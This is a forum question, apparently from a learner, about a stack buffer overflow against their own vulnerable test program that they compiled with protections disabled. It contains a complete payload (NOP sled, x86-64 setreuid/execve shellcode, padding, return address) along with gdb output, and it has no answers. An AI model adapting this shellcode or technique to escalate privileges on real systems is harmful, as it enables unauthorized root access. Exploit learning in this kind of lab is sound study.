
I am attempting a basic buffer overflow attack that spawns a root shell. I am running into the problem "Detaching after fork from child process ***".

How do I get rid of this and spawn a root shell?

I am trying to spawn a root shell from my gdb as a normal user (obviously). I have compiled the vulnerable program in every possible way: I disabled ASLR... disabled DEP... compiled it with -fno-stack-protector.

When I run it in my gdb, I get this -->

One more thing: the buffer size is 100, and the segmentation fault occurs at 120!

So 60 bytes of \x90 + 50 bytes of shellcode + 10 bytes of "A" (padding) + overwritten address (8) = (60+50+10=120; 120+overwritten address=128)

[bhabi@localhost buffer]$ gdb -q bof

(gdb) r `perl -e 'print "\x90" x 60, "\x48\x31\xc0\x48\x83\xc0\x71\x48\x31\xff\x48\x31\xf6\x0f\x05\xeb\x13\x48\x31\xc0\x48\x83\xc0\x3b\x5f\x88\x67\x07\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x90", "A" x 10, "\x60\xe4\xff\xff\xff\x7f\x00\x00"'`

Starting program:

/home/bhabi/buffer/bof `perl -e 'print "\x90" x 60, "\x48\x31\xc0\x48\x83\xc0\x71\x48\x31\xff\x48\x31\xf6\x0f\x05\xeb\x13\x48\x31\xc0\x48\x83\xc0\x3b\x5f\x88\x67\x07\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x90", "A" x 10, "\x60\xe4\xff\xff\xff\x7f\x00\x00"'

process 7*** is executing new program: /bin/bash
Missing separate debuginfos, use: debuginfo-install glibc-2.14.90-24.fc16.9.x86_64
Detaching after fork from child process 7***.
Detaching after fork from child process 7***.
Detaching after fork from child process 7**.
[bhabi@localhost buffer]$

I was expecting [root@localhost buffer]$


I even tried

set follow-fork-mode child
set detach-on-fork off

0 Answers